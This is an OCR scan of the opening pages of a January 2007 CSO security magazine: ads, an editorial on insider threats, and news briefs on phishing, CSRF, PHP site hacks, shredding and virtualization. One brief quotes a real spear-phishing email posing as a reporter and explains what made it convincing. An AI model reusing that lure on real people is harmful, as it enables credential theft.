Hewlett-Packard  Scandal  Changes  Everything  (Not!) 


Page  26 


VIRTUALLY  SECURE? 

The  pros  and  cons  of 
virtualization 

Page  14 

GRID,  LOCKED 

Power  companies  face 
new  cyber  standards 

Page  32 


Is  responsible  disclosure  dead? 

How  the  Web’s  unruly  technical  and  legal 
landscape  imperils  security  research. 


BY  SCOTT  BERINATO 


PAGE  18 


January  2007  $9.00  www.csoonline.com 


HILLING 


ppp/IT 

FFECT 


ARBOR 

NETWORKS 

Copyright  <C>  2006  Arbor  Networks,  Inc.  All  rights  reserved.  Arbor  Networks,  the  Arbor  Networks  logo,  Peakflow,  and  ArbOS  are  registered  trademarks  of  Arbor  Networks,  Inc.,  and  Security  to  the  Core. 

Performance  to  the  Edge,  is  a  trademark  of  Arbor  Networks.  Inc.  All  other  trademarks  are  the  property  of  their  respective  owners. 


Security  to  the  Core.  Performance  to  the  Edge. 


H'l  |%\  To  learn  more,  watch  the  Webcast  "Securing  the  Enterprise  with 
^  *  Network  Behavior  Analysis"  at  www.arbornetworks.com/cso-nba 


Get  award-winning  protection  for  your  network. 

The  accelerating  change  of  network  technology  has  created  more  complex  security  threats, 
such  as  attacks  from  the  network's  vulnerable  perimeter.  Developed  by  Arbor  Networks,  Arbor 
Peakflow®  X  is  an  award-winning  solution  that  lets  you  implement  advanced  network  behavior 
analysis  (NBA)  capabilities  across  your  network  while  supporting  compliance  with  security 
policies  and  regulations.  Gain  network-wide  visibility  and  anomaly  detection  with  NBA  -  only 
from  Arbor  Networks. 


The  threat  of 
being  harassed 
is  already  a 
disincentive. 
Essentially  now 
my  research  is 
restricted.” 

PURDUE  UNIVERSITY 
PROFESSOR  DR.  PASCAL 
MEUNIER,  PAGE  18 


January 


Vol.  6,  No.  1 


COLUMNS 

14  Virtually  Secure 
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And,  unfortunately,  hackers  too. 

By  Simson  Garfinkel 

36  Eyes  on  the  World 

CSO  UNDERCOVER  The  need  to  standardize 
our  surveillance  systems  seemed  obvious— 
until  we  had  to  sell  the  idea  globally. 


DEPARTMENTS 


Briefing 

The  bad  guys  get  smarter;  Benchmarks  for 
confidential  hotlines;  The  Security  Blotter; 
Watch  out  for  PHP  holes;  Strange  tales  from 
theft  reports;  Research  aims  to  detect  online 
terrorist  activity;  When  to  shred  documents 

4(  Debriefing 

Fearless  Predictions  for  2007 


V’. 


IN  EVERY  ISSUE 


18  The  Chilling  Effect 

cover  story  SOFTWARE  SECURITY  How  the  Web  makes  creating 
software  vulnerabilities  easier,  disclosing  them  more  difficult  and 
discovering  them  possibly  illegal.  By  Scott  Berinato 

5  Things  About  Corporate  Investigations  the 
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CSO  Fundamentals 
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Inside  Out 


Every  month  we  get  at  least  one  press  release  citing  the 
latest  security  survey  as  evidence  that  the  insider  threat  is 
greater  than  the  outsider  threat.  This  is  a  cue  for  you,  dear 


CSO,  to  spend  less  on  your  perimeter  and  more  on  whatever  “insider  threat 
prevention”  tool  the  press  release  is  trumpeting.  Amusingly,  we  also  frequently 
get  press  releases  claiming  the  opposite,  mentioning  the  ever-growing  cre¬ 
scendo  of  targeted  hacks  and  zero-day  exploits. 

Insider  versus  outsider?  To  me  it’s  a  moot  argument,  and  press  releases 
about  which  is  more  dangerous  make  my  eyes  glaze  over.  Any  security  plan 
worth  its  salt  needs  controls  to  defend  against  both. 

The  security  plan  was  actually  part  of  the  problem  at  Hewlett-Packard, 
as  noted  in  Sarah  D.  Scalet’s  examination  of  HP’s  investigation  fiasco  (“5 
Things  About  Corporate  Investigations  That  Won’t  Change,”  Page  26). 
However,  while  the  goof-ups  perpetrated  in  the  overzealous  investigation 
rightfully  drew  much  of  the  attention,  at  the  root  of  all  of  the  mess  you  had  a 
very  well-placed  insider  divulging  confidential  information. 

When  you’re  trying  to  keep  your  employees  on  the  straight  and  nar¬ 
row,  obviously  you  need  good  internal  controls.  Segregation  of  duties,  solid 
auditing  procedures,  that  Sarbanes- Oxley  stuff.  There’s  also  a  whole  class  of 
relatively  new  software  products  that  aim  to  help  prevent  company  employ¬ 
ees  from  misappropriating  confidential  data  or  proprietary  plans.  Their 
insider  versus  outsider  press  releases  may  be  boring,  but  I  find  the  products 
fascinating.  In  various  ways,  they  all  monitor  employees’  computer  activi¬ 
ties  pertaining  to  corporate  data.  If  Larry  in  the  call  center  tries  to  burn  a 
CD  with  a  bunch  of  customer  credit  card  numbers,  the  software  can  block 


Larry,  warn  him,  alert  the  security  department  or  all 
of  the  above.  Vendors  in  this  space  include  Verdasys, 
Vontu,  Vericept,  Oakley  Networks,  PortAuthority 
and  Reconnex.  Then  there  are  other  folks  focused 
narrowly  on  outbound  messaging,  such  as  Orches- 
tria.  One  challenge  is  that  the  vendors  use  differing 
terminology  to  describe  what  they  do:  content  filter¬ 
ing,  intellectual  property  protection,  data  leakage 
(or  even  “extrusion”)  prevention.  Also,  they  all  have 
different  points  of  emphasis  (messaging  leaks,  data 
at  rest,  USB  copying)  and  different  methods  (some 
sit  on  the  network,  others  put  a  client  on  each  com¬ 
puter),  so  choosing  the  right  one  requires  compari¬ 
son  shopping.  The  vendor  field  in  fact  seems  a  bit 
overcrowded,  so  some  consolidation  wouldn’t  shock 
me.  But  the  premise  of  this  product  class  makes 
sense  to  me,  particularly  for  big-company  CSOs  with 
highly  sensitive  intellectual  property  and/or  lots  of 
regulatory  oversight. 

Of  course,  the  HP  boardroom  leak  was  mostly  via 
cell  phone,  not  e-mail.  Sometimes  technology  only 
gets  you  so  much.  - Derek  Slater,  dslater@cxo.com 


HOW  TO  REACH  US  E-mail  csoletters@cxo.com  Phone 
508  872-0080  Fax  508  879-7784  Address  CSO  Maga¬ 
zine,  492  Old  Connecticut  Path,  P.O,  Box  9208,  Framing¬ 
ham,  MA  01701-9208;  Subscriber  Services  Phone  866 

354-1125  Fax  847  564-9453  E-mail  cso@omeda.com; 
Reprints  For  article  reprints  (100  quantity  or  more),  contact 
Jennifer  Eclipse  at  PARS  International  at  212  221-9595  x237 
or  e-mail  jeclipse@parsintl.com. 


ABOUT  IDG  International  Data  Group  (IDG),  the  lead¬ 
ing  global  provider  of  IT  media,  research,  conferences 
and  events,  informs  more  people  about  technology  than 
any  other  company  in  the  world.  Offering  the  widest 
range  of  media  options,  IDG  reaches  more  than  120 
million  technology  buyers  in  85  countries  representing 
95  percent  of  worldwide  IT  spending.  IDG  publishes  more 
than  300  newspapers  and  magazines  in  85  countries, 
led  by  the  Computerworld,  Infoworld,  Macworld.  Network 


World,  PC  World  and  CIO  global  product  lines.  IDG  offers 
online  users  the  largest  network  of  technology-specific 
sites  around  the  world  through  IDG.net  ( www.idg.net ), 
a  gateway  to  IDG's  330  websites  powered  by  more  than 
2,000  journalists  reporting  from  every  continent  in  the 
world.  IDG  also  produces  168  technology-related  confer¬ 
ences  and  events,  and  research  company  IDC  provides 
global  market  intelligence,  analysis  and  forecasts  in  43 
countries. 
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Secure  Access, 


©  2006  Authenex,  Inc.  All  rights  reserved.  Authenex,  A-Key,  ASAS,  ACert.  My  A-Key  and  associated  logos  are  registered  or 
unregistered  trademarks  of  Authenex,  Inc.  All  other  registered  or  unregistered  trademarks  are  the  property  of  their  respective  owners. 


The  Authenex  Strong  Authentication  System  (ASAS  )  is  the  most 
advanced,  cost-effective  network  security  system  with  two-factor 
authentication  for  LAN,  remote  VPN  and  web  access.  Consisting  of  the 
ASAS  Server  and  a  chip-based  token  called  the  A-Key®,  ASAS  provides 
PKI  Challenge-Response  or  One-Time  Password  authentication  to  your 
users,  wherever  they  are.  Because  the  A-Key  token  is  secure,  even  if  it 
is  lost  or  stolen,  it  is  unusable  to  anyone  but  its  owner  and  administrator. 


FOR  MORE  INFORMATION 

www.authenex.com  or  call  1 .877. AUTH EN EX 


3-way  Protection;  One  Token 

One-Time  Password,  PKI  (Certificates)  or  Challenge-Response  Authentication 
-  all  available  on  the  same  key. 


Quick  and  Easy  Installation 

The  ASAS  solution  is  fully  compatible  with  existing  IT  infrastructure,  VPN  and 
Firewall,  via  RADIUS  and  TCP/IP.  Installation  usually  takes  less  than  30 
minutes. 


Mobile  Identity 

The  available  My  A-Key™  feature  stores  user  profiles  which  can  be  utilized  with 

applications,  such  as  Single-Sign  On.  For  PKI  applications,  the  ACert  "  function 
stores  digital  certificates  and  signatures  on  the  A-Key  token. 


Cost  Effective  Solution 

An  all-in-one  solution  utilizing  Authenex  proprietary  technology  makes  the  ASAS 
solution  very  affordable  and  ensures  a  quick  return  on  investment. 


For  more  information  and  to  register  visit  www.csoonline.com/csop_2007  or  call  800-366-0246 
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The  Business  Case  for  Security 

How  to  Plan,  Deliver,  Measure  and  Communicate 

Join  us  at  The  Broadmoor,  Colorado  Springs,  CO, 
March  18  -  20, 2007 and  learn  from  the  best  in  the 
business  about  the  process  of  building  the  business 
case  for  security. 


Don’t  miss  the  Pre-Conference 
Critical  Incident  Table  Top 
Exercise  on  Sunday,  March  18th 


Program  Highlights: 


CSO  Perspectives  offers  security  executives 
unparalleled  access  to  many  of  the  world’s 
leading  experts  in  security  and  risk  management. 


Platinum 

Sponsor: 


•  1 1 1  •  1 1 1  • 
CISCO. 

Opening  Keynote: 

L.  Paul  Bremer,  Ambassador,  Author  of  My  Year  in  Iraq:  The  Struggle  to  Build  a  Future  of  Hope 
Additional  speakers  include: 

Elizabeth  King  ,  Vice  President,  Info  Management  Services,  Starbucks  Coffee  Company 
Audrey  Pantas  ,  Chief  Information  Security  Officer,  Xerox  Corporation 
Bob  Bragdon  ,  Publisher,  CSO  magazine 

Closing  Keynote:  How  Do  You  Know  When  It’s  Working? 

William  Wipprecht  ,  Executive  Vice  President  and  CSO,  Wells  Fargo  &  Company 


MALWARE  Attackers  have  raised  their  game  markedly  in  the 
past  three  months,  delivering  salvos  harder  to  resist  (and  detect). 
Recent  developments: 

■  Advanced  phishing  In  the  parry  and  thrust  of  phishing 
defenses  and  phishing  attacks,  one  particular  e-mail,  sent  to  bank 
employees,  represented  a  bold  move  for  the  bad  guys  in  its  level 
of  social  engineering  sophistication:  It  pretended  to  be  from  a 
journalist  researching  a  news  story  about  a  data  leak  at  that  bank, 
and  addressed  the  recipient  by  first  name. 

“Dear _ ,"  the  e-mail  started.  “I  am  a  reporter  for  Finance  News 

doing  a  follow-up  story  on  the  recent  leak  of  customer  records  from 
[the  bank’s  name],  I  saw  your  name  come  up  in  the  article  from 
Central  News  and  would  like  to  interview  you  for  a  follow-up  piece.” 

The  e-mail  then  provided  what  appeared  to  be  a  link  to  the 
"Central  News"  story— a  URL  that  included  the  bank’s  name  in  its 
characters.  The  message  ended,  "If  you  have  time  I  would  appreci¬ 
ate  an  opportunity  to  further  discuss  the  details  of  the  above  article. 
Regards,  Gordon  Reily.” 

At  one  bank,  hundreds  of  employees  received  the  e-mail.  The 
CSO  at  that  bank  (he  would  speak  only  on  the  condition  of  anonym¬ 


ity)  eventually  determined  that  clicking 
on  the  link  connected  to  a  website  in 
China  and  installed  a  keylogger  on  the 
machine  that  accessed  the  link.  Such  a 
targeted  attack  would  seek  to  have  a  bank 
employee  with  data  access  unwittingly 
log  passwords  and  account  information, 
which  the  bot  would  deliver  to  the  attacker. 

The  e-mail  was  sophisticated;  its 
grammar  was  impeccable,  and  it 
addressed  recipients  by  name  (which 
means  the  attacker  had  access  to  the 
bank’s  e-mail  rolls  and  could  avoid 
blasting  the  e-mail  and  getting  caught 
in  spam  filters).  The  guise  of  a  journalist 
following  a  story  was  reasonable.  And 
the  e-mail  suggested  that  the  recipi¬ 
ent  was  cited  in  a  previous  story,  which 
would  pique  the  person’s  interest. 

■  IM  as  distribution  network  Chris 
Boyd,  director  of  malware  research  at 
FaceTime  Communications,  came  across 
a  botnet  in  development  that  enabled 
an  attacker  to  insert  a  link  into  an  IM 
conversation  that,  when  clicked,  installed 
a  bot  on  that  computer.  It  appeared  that 
the  compromised  computer  then  would 
become  part  of  a  spam  distribution  bot¬ 
net.  But  after  analyzing  the  "ridiculously 
complex  and  bizarre"  code,  Boyd  believes 


eBay  Phishing 

Indiana  University 
researchers  conducted  an 
experiment— after  getting 
approval  that  it  was  ethi¬ 
cal— in  which  they  targeted 
eBay  users  with  a  phishing 
attack.  The  researchers, 
Markus  Jakobsson  and 
Jacob  Ratkiewicz,  thought 
of  this  as  “spear  phishing” 
because  of  its  targeted 
nature,  rather  than  the 
typical  spamlike  attempts 
to  fool  end  users.  The 
researchers  had  a  success 
rate  of  up  to  14  percent  per 
attack  per  year,  compared 
with  previous  estimates 
that  phishing  yields  a 
3  percent  success  rate. 

“We  think  spear  phishing 
attacks  will  become  more 
prevalent  as  phishers  are 
more  able  to  harvest  pub¬ 
licly  available  information 
to  personalize  each  attack,” 
Ratkiewicz  said. 


that  the  attackers  were  still  developing 
the  botnet’s  capabilities  to  go  far  beyond  that. 

Mastering  the  use  of  IM  as  a  malware  distribution  engine 
concerns  Boyd  and  others,  because  once  attackers  can  insert  their 
links,  it’s  hard  to  stop  them.  For  example,  even  if  the  IM  network 
blocks  certain  IP  addresses  and  link  hosts  from  getting  on  its  net¬ 
work,  "it  takes  five  minutes  to  change  the  link,"  Boyd  says.  That’s  a 
lot  of  time  for  an  IM  network  that  has  more  than  80  million  users. 

■  The  specter  of  CSRF  Cross-site  request  forgery,  or  CSRF,  is 
when  an  attacker  loads  a  URL  for,  say,  online  banking  into  a  page  he 
controls.  If  a  user  visited  the  bank  site  but  didn’t  log  out  and  then 
went  to  the  site  the  hacker  controls,  she  would  still  be  logged  in  to 
the  banking  session,  a  cookie  would  authenticate  her,  and  the  URL 
the  hacker  injected  into  the  site  would  continue  the  banking  session. 
A  test  example  of  CSRF  was  used  to  add  movies  to  people’s  NetFlix 
queues  without  their  knowledge.  -Scott  Berinato 


ILLUSTRATION  BY  DARCY  MUENCHRATH 
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Breaches,  scams  and  other  recent 
incidents  of  note 


Sophos  asserted  Vista  was  vulnerable 
to  malware;  Microsoft  disagreed  and 
suggested  that  such  malware  relied  on 
social  engineering  rather  than  software 
flaws. 


in  the  Light 

CONFIDENTIAL  HOTLINES  A  report  analyzing  more 
than  180,000  hotline  calls  collected  from  550  organizations 
found  that  in  the  majority  of  cases— 65  percent— the  callers 
reported  information  that  warranted  an  investigation. 

The  ensuing  investigations  resulted  in  an  organization 
taking  corrective  action  46  percent  of  the  time,  with  outcomes 
that  included  firing,  disciplining  or  suspending  workers  who 
violated  company  policies.  The  “2006  Corporate  Governance 
and  Compliance  Hotline  Benchmarking  Report"  was  prepared 
by  The  Network,  a  hotline  and  employee  communications 
system  provider,  using  anonymized  data  from  its  clients 
between  2002  and  2005.  The  CSO  Executive  Council,  a 
professional  organization  for  security  executives  affiliated 
with  CSO,  performed  analysis  on  the  data  with  help  from  the 
Association  of  Certified  Fraud  Examiners. 

The  report  includes  some  findings  within  vertical  indus¬ 
tries— for  example,  retail  employees  are  more  likely  than 
workers  in  other  sectors  to  call  a  hotline.  Such  findings  could 
be  used  by  CSOs  to  evaluate  their  own  company's  experi¬ 
ence,  says  Bob  Hayes,  managing  director  of  the  CSO  Execu¬ 
tive  Council.  Hayes  believes  this  is  the  first  such  compilation 
in  the  three  decades  since  whistle-blower  hotlines  were 
deployed.  The  researchers  plan  to  produce  another  report 
this  year  incorporating  2006  results. 

Other  findings  from  the  study: 

■  Seventy-one  percent  of  reports  to  hotlines  shared 
information  that  was  news  to  management. 

■  Callers  reporting  allegations  of  corruption  and  fraud 
were  less  likely  to  remain  anonymous  than  callers 
reporting  other  kinds  of  incidents,  such  as  a  concern 
about  health,  safety  and  the  environment. 

■  Thirty-nine  percent  of  callers  learned  of  the  hotline  by 

seeing  a  sign  about  it.  -Michael  Goldberg 


Democrats  take  control  of  Congress. 

The  Senate  confirmed  Robert  Gates’s 
nomination  to  succeed  Donald  Rumsfeld, 
who  resigned  as  defense  secretary  the 
day  after  Democrats  won  enough  House 
and  Senate  seats  to  control  a  majority 
in  both  chambers.  On  Dec.  6,  the  Iraq 
Study  Group  advised  President  Bush  to 
revamp  his  Iraq  war  goals  and  Middle 
East  diplomatic  policies,  including 
opening  talks  with  Iran  and  Syria. 

Oregon  lawyer  mistakenly  linked 
to  Madrid  bombings  settles  suit. 

The  U.S.  government  agreed  on  Nov. 

29  to  pay  Brandon  Mayfield  $2  million 
to  settle  a  lawsuit  stemming  from  his 
wrongful  arrest  and  jailing  for  two  weeks 
in  the  aftermath  of  the  Madrid  train 
bombings  in  2004.  The  government 
also  agreed  to  destroy  materials  col¬ 
lected  during  electronic  surveillance  of 
Mayfield,  The  Washington  Post  reported. 
Mayfield,  who  is  still  pursuing  a  legal 
challenge  to  the  USA  Patriot  Act,  alleged 
he  was  targeted  because  he  is  Muslim. 

Vista  released  to  businesses. 

Microsoft’s  latest  desktop  operating 
system,  and  first  since  Windows  XP  in 
2001,  officially  hit  the  corporate  market 
Nov.  30.  It  represents  a  big  investment 
in  security,  Microsoft  says.  “Vista  is 
definitely  a  more  secure  version  of 
Windows,"  because  it  uses  encryption 
and  better  user  access  control,  says 
Vincent  Weafer,  senior  director  of 
Symantec  Security  Response.  But 
within  days  of  its  launch,  researchers  at 


Ease  in  Sarbanes-Oxley  rules  urged. 

The  Committee  on  Capital  Markets 
Regulation,  a  bipartisan  group  of  22 
business,  legal  and  academic  experts, 
issued  a  report  Nov.  30  urging  the  fed¬ 
eral  government  to  ease  some  aspects 
of  Sarbanes-Oxley  compliance— for 
example,  adopting  more  reasonable 
standards  for  internal  controls  and 
financial  statements,  and  providing 
more  precise  guidance  on  the  role  of 
auditors— so  that  American  businesses 
can  cut  costs  and  be  more  competitive. 
“The  Sarbanes-Oxley  Act  of  2002  helped 
restore  market  confidence  after  several 
high-profile  scandals.  However,  the  cost 
of  auditing  internal  controls  is  unneces¬ 
sarily  high  and  can  be  brought  down,” 
says  Hal  S.  Scott,  Nomura  Professor 
and  director  of  international  financial 
systems  at  Harvard  Law  School  and 
director  of  the  committee. 

SHORT  TAKES.  The  Transporta¬ 
tion  Security  Administration  said  it 
would  charge  $28  a  year  to  process 
background  checks  on  each  airline 
passenger  who  joins  the  Registered 
Traveler  program  to  get  through  security 
checks  more  quickly,  Reuters  reported.... 
Kaiser  Permanente  Colorado  confirmed 
that  a  laptop  containing  private  data  of 
approximately  38,000  members  was 
stolen  from  the  car  of  an  employee  in 
California,  Computerworld  reported.... 
Secure  Computer  agreed  to  pay 
$1  million  to  settle  a  Washington  state 
case  over  its  pop-up  ads  marketing 
software  that  purportedly  scans  users' 
PCs  for  spyware. 
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Watch  Out 
for  PHP  Holes 

In  the  first  half  of  2006,  desktop  filtering  software  maker 
Websense  counted  a  100  percent  rise  in  websites  that 
contained  code  potentially  harmful  to  visitors.  The  company 
declined  to  reveal  how  many  websites  it  tallied,  but  it  did  say  that 
40  percent  of  the  sites  were  hacked— that  is,  they  had  their  web¬ 
site  code  altered  by  outsiders.  Of  those  hacked  websites,  the  vast 
majority  (91  percent)  were  commis¬ 
sioned  to  install  Trojan  horses  that  take 
control  of  visiting  computers  to  turn 

them  into  bots— to  relay 
spam,  wage  denial-of- 
service  attacks  or  carry 
out  ID  theft  schemes— 
or  use  them  as  bases 
for  spreading  malicious 
programs  such  as  worms  and  keylog- 
gers  inside  the  enterprise. 

Ben  Butler,  network  abuse  manager 
at  GoDaddy.com,  a  website  domain 
seller  and  hosting  company,  says  he 
believes  that  as  many  as  50  percent  to 
60  percent  of  those  successful  hacks 
involve  some  form  of  poorly  written 
Web  application  developed  in  an  easy- 
to-use,  popular  hypertext  development 
language  called  PHP. 

“PHP  is  an  extremely  hacked  appli¬ 


cation  type  because  it  allows  server-side  scripts  to  happen  on  a 
website.  This  script  is  communicating  back  to  the  server,  and  that 
pathway  can  be  hacked,”  says  Butler,  who  bases  his  opinion  on  the 
hundreds  of  investigations  GoDaddy  opens  each  week  into  hacked 
and  abusive  websites  among  its  hosted  domains. 

By  the  end  of  last  year,  some  2,100  PHP-related  vulnerabilities 
existed  in  IBM  Internet  Security  Systems’  database  of  30,000 
known  vulnerabilities.  Of  all  Web  development  languages,  PHP 
is  most  widely  used  because  of  its  ease,  says  Chris  Shiflett,  who 
runs  the  PHP  Security  Consortium  (at  http://phpsec.org )  and  is 
the  author  of  Essential  PHP  Security. 

And  with  ease  of  use  come  vulnerabili¬ 
ties,  says  Bill  Boni,  corporate  vice  president 
of  information  security  and  protection  at 
Motorola.  Boni  says  that  when  you  have  lots 
of  inexperienced  people  working  with  an 
easy-to-use  Web  development  application,  it 
leads  to  insecure  code. 

Boni  adds  that  even  experienced  devel¬ 
opers,  under  tight  deadlines,  can  create  Web 
applications  that  are  vulnerable  to  common 
Web  attacks. 

Two  examples:  Last  June,  Circuit  City  had 
one  of  its  webpages  turned  into  a  spamware 
installer.  The  vulnerability  was  in  a  poorly 
written  forms  field  developed  in  PHP.  And,  in 
October,  IBM’s  popular  Websphere  applica¬ 
tion  was  found  to  have  a  cross-site  scripting 
vulnerability,  the  same  type  of  vulnerability 
used  to  propagate  a  worm  on  MySpace  in 
October  2005. 

-Deb  Radcliff 


WHAT  TO  DO 

1.  Web  application  filters  are  a  good  first  step  to 
protecting  your  Web  applications  from  mali¬ 
cious  tampering,  but  they  don't  catch  every¬ 
thing.  Bill  Boni  strongly  recommends  ongoing 
training  in  coding  best  practices  for  all  Web 
developers  regardless  of  the  development 
language  they  use.  “Code  reviews,  application- 
level  security  scanning  and  rigorous  security 
testing  against  your  Web  applications  are  all 
essential,"  he  adds. 

2.  Keep  your  browsers  patched  and  updated, 
since  the  malicious  code  gets  in  through 
vulnerabilities  in  the  browser,  Chris  Shiflett 
says.  “If  you  can,  get  on  a  less  used  and  less 
targeted  browser,  a  really  solid  and  mature 
browser  like  Opera,  Safari  or  Firefox,”  he  says. 

3.  Make  sure  endpoint  security  software  pro¬ 
grams  are  up  to  date  and  centrally  managed. 


All  That  Glitters  Is  Gone 


INVESTIGATIONS  Some 
items  from  the  annals  of  stolen 
property  we’ve  noticed  recently: 

THE  HIGH  PRICE  OF  COPPER,  at 
$3.60  a  pound,  has  police  in  sev¬ 
eral  cities  investigating  plundered 
central-air  units  and  pilfered 
copper  piping.  The  Wall  Street 
Journal  reported  in  September 
that  the  copper  components  of 
an  air-conditioning  unit  might 
fetch  $50  to  $150  on  the  scrap 


market,  while  the  replacement  for 
the  home  owner  costs  $2,000  or 
more.  Some  criminals  have  posed 
as  servicemen  and  removed 
hundreds  of  dollars  of  copper 
piping  at  a  time. 

SCRAP  YARDS  in  Montgom¬ 
ery,  Ala.,  must  now  report  to 
the  police  on  any  copper  they 
purchase. 


MORE  THAN  20  ANTIQUE 
WEATHER  VANES,  some  weighing 
hundreds  of  pounds,  have  been 
stolen  off  barn  roofs  in  New 
England  and  New  York  because 
of  their  value.  One  vane  recently 
fetched  $1.2  million  at  auction. 

FOX  NEWS  RECENTLY  picked  up 
a  report  of  “gold  farmers”  who 
play  online  role-playing  games 
like  World  of  Warcraft  in  order 
to  collect  gold  coins  that  they 


can  sell  to  other  players  for  cash. 
The  editor  of  one  game  fan-site 
reported  that  the  mercenaries 
have  become  increasingly  brazen 
and  started  virtually  “mugging” 
other  players  for  gold.  It’s  not 
clear  whether  this  is  illegal  or  just 
bad  sportsmanship. 
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Research  Aims 
to  Detect  Online 
Terrorist  Activity 

HOMELAND  SECURITY  Once  the  federal 
government  contract  details  are  set,  researchers  at 
four  universities  will  begin  trolling  the  Web  for  early 
signs  of  terrorist  activity. 

Rutgers,  the  State  University  of  New  Jersey;  the 
University  of  Southern  California;  the  University  of 
Illinois  at  Urbana-Champaign;  and  the  University  of 
Pittsburgh  are  working  on  a  $10.2  million  project 
to  research  methods  for  detecting  online  terrorism 
activity. 

In  July  2006  the  Department  of  Homeland 
Security  announced  the  three-year  grant  to  the  four 
universities  to  advance  information  analysis  and 
computational  technologies. 

Fred  Roberts,  director  of  the  Center  for  Discrete 
Mathematics  and  Theoretical  Computer  Science  at 
Rutgers,  says  researchers  hope  to  develop  algorithms 
that  will  find  patterns  and  relationships  in  such  public 
sources  as  news  stories  and  blogs  to  determine 
authorship,  even  when  a  writer  tries  to  hide  his  identity. 
Researchers’  methods  will  include  mathematics  graph 
theory,  dynamic  data  analysis,  optimization,  “machine 
learning”  and  statistical  analysis.  Each  university  has 
its  own  set  of  partners;  for  example,  Rutgers’  collabo¬ 
rators  include  AT&T  Labs,  Bell  Labs  and  Rensselaer 
Polytechnic  Institute. 

Privacy  concerns  about  the  research  project  have 
been  voiced  in  the  blogosphere.  ShadowMonkey,  a 
blogger  who  has  a  “DHS  Watch,”  questioned  the  proj¬ 
ect  after  it  was  announced  in  July:  “If  you’re  writing  on 
the  Net  using  a  pseudonym,  are  you  going  to  be  placed 
on  a  watch  list?" 

Roberts  says  that  “protecting  privacy  is  part  of  the 
research  agenda.”  Safeguards  will  include  anonymiz¬ 
ing  data,  using  only  publicly  available  sources  and 
adhering  to  data  handling  protocols  created  by  a 
privacy  officer. 

Besides  privacy,  the  project  will  tackle  many 
challenges  along  the  way,  such  as  the  vast  amount  of 
information  with  changing  sources  and  how  quickly 
information  flows  over  the  Web.  In  order  to  evalu¬ 
ate  potential  terrorist  activity,  the  researchers  must 
develop  technologies  to  rate  consistency  and  reliability 
of  the  sources  of  information.  Researchers  are 
currently  finalizing  contracts  with  DHS. 

-Diann  Daniel 


When  Hewlett-Packard’s 

overzealous  investigation  into 
boardroom  leaks  hit  the  news 
last  fall,  many  people  were  shocked— 
shocked!— to  hear  that  the  tech  giant 
may  have  hired  third-party  investigators 
to  go  through  individuals'  trash.  In  fact, 
Dumpster  diving  is  a  favorite  technique 
of  investigators,  and  depending  on  the 
circumstances— such  as  local  laws  and 
whether  trash  pickup  occurs  on  public 
property— it  is  often  legal. 

All  of  which  creates  the  need  for 
employees  to  shred  sensitive  docu¬ 
ments.  Below  are  a  few  best  practices 
you  can  share  with  colleagues. 

Remember  that  trash  is  not 
inherently  private.  In  1998,  the 
Supreme  Court  ruled  that  Americans 
do  not  have  a  right  to  privacy  when  it 
comes  to  their  trash. 

What’s  more,  the  Eco- 
nomic  Espionage  Act  r 

of  1996,  which  made 
it  a  federal  offense  to 
steal  trade  information,  does  not  protect 
companies  that  fail  to  take  reasonable 
steps  to  protect  their  information. 

Keep  documents  only  as  long  as  you 
need  to,  then  follow  the  instructions 
for  disposal.  Especially  in  regulated 
industries  such  as  health  care  and 
financial  services,  your  company  should 
have  policies  in  place  for  how  long  differ¬ 
ent  types  of  documents  should  be  kept 
on  hand.  Be  familiar  with  the  retention 
policies  for  documents  you  handle,  and 
make  sure  you  follow  the  instructions  for 
disposing  of  them  as  soon  as  the  reten¬ 
tion  period  is  up. 

Don’t  shred  documents  out  of 
turn— such  as  when  your  company  is 
about  to  get  sued.  It  will  make  you  look 
guilty,  and  the  law  is  not  in  your  favor. 


When  customer  or  employee 
information  is  headed  for  the  trash, 
destroy  it  if  it  contains  information 
that  you  would  not  want  made  public 
about  yourself.  Documents  that  contain 
names,  Social  Security  numbers,  dates 
of  birth,  account  balances,  health  con¬ 
ditions  or  other  personal  information 
should  always  be  shredded. 

Shred  trash-bound  documents  that 
could  help  the  competition.  Customer 
lists,  sensitive  pricing  information, 
strategic  planning  documents  and  trade 
secrets  should  never  just  be  tossed  in 
the  garbage  or  recycle  bin. 

Be  especially  diligent  if  you  deal 
i  information  from  consumer 
reports.  The  Fair  Credit  Report¬ 
ing  Act  protects  credit  reports 
and  credit  scores  as  well  as 
reports  relating  to  employment 
background,  check  writing  history, 
insurance  claims,  residential  or  tenant 
history,  or  medical  history.  Anyone  who 
handles  this  type  of  information— from 
a  large  mortgage  company  on  down  to 
a  family  hiring  a  nanny— must  follow 
strict  disposal  guidelines  that  may  rea¬ 
sonably  include  burning,  pulverizing  or 
shredding  papers  so  that  the  informa¬ 
tion  cannot  be  read  or  reconstructed. 

Speak  up  if  the  shredding  system 
in  your  department  is  so  onerous  that 
people  avoid  it.  Companies  have  many 
options  for  shredding  documents,  from 
a  $40  cross-cut  shredder  to  outsourced 
services  that  will  pick  up  locked  bins  of 
sensitive  documents,  shred  them  onsite 
for  a  fee  based  on  quantity  and  provide 
a  certificate  of  destruction. 

-Sarah  D.  Scalet 
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Virtually  Secure? 

Virtual  machines  have  a  lot  to  offer  CISOs  and  security 
researchers  alike.  And,  unfortunately,  hackers  too. 

By  Simson  Garfinkel 

RTUALIZATION  IS  THE  hot  new  trend  in  corporate  data 
centers  today.  Virtualization  servers  from  Microsoft,  VMware  and 
XenSource  allow  many  virtual  computers  to  run  on  a  single  (real) 
computer  system.  In  practice,  this  means  that  20  or  30  physical 
servers  in  a  machine  room  can  be  turned  into  the  same  number  of 
virtual  machines  running  on  a  single  physical  system  with  two,  four  or  eight 
processors. 

Turning  30  computers  into  one  can  dramatically  reduce  the  need  for  power, 
cooling,  cabling  and  management.  And  even  though  the  typical  virtualization 
server  saps  between  5  percent  and  10  percent  of  the  physical  computer’s  pro¬ 
cessing  capabilities,  virtualization  frequently  makes  an  organization’s  applica¬ 
tions  run  faster,  not  slower.  That’s  because  the  physical  servers  being  replaced 


are  quite  often  underutilized  single-CPI 
that’s  a  few  years  out  of  date.  By  con¬ 
trast,  new  multiprocessor  systems 
can  give  each  virtualized  machine  a 
boost  of  CPU  power  at  the  precise 
instant  when  that  CPU  power  is 
needed— and  give  that  same  boost 
to  other  machines  when  they’re  the 
ones  who  need  it  most. 

But  besides  being  a  powerful 
tool  for  saving  money,  virtualization 
is  one  of  the  up-and-coming  power 
tools  in  the  arsenal  of  today’s  secu¬ 
rity  practitioners. 


Crash,  Burn,  Repeat 

For  example,  just  a  few  years  ago 
most  security  consultants  had  one 
or  more  “crash-and-burn”  machines 
for  experimenting  with  potentially 
hostile  programs  like  spyware,  Tro¬ 
jans  and  computer  viruses.  These  days 
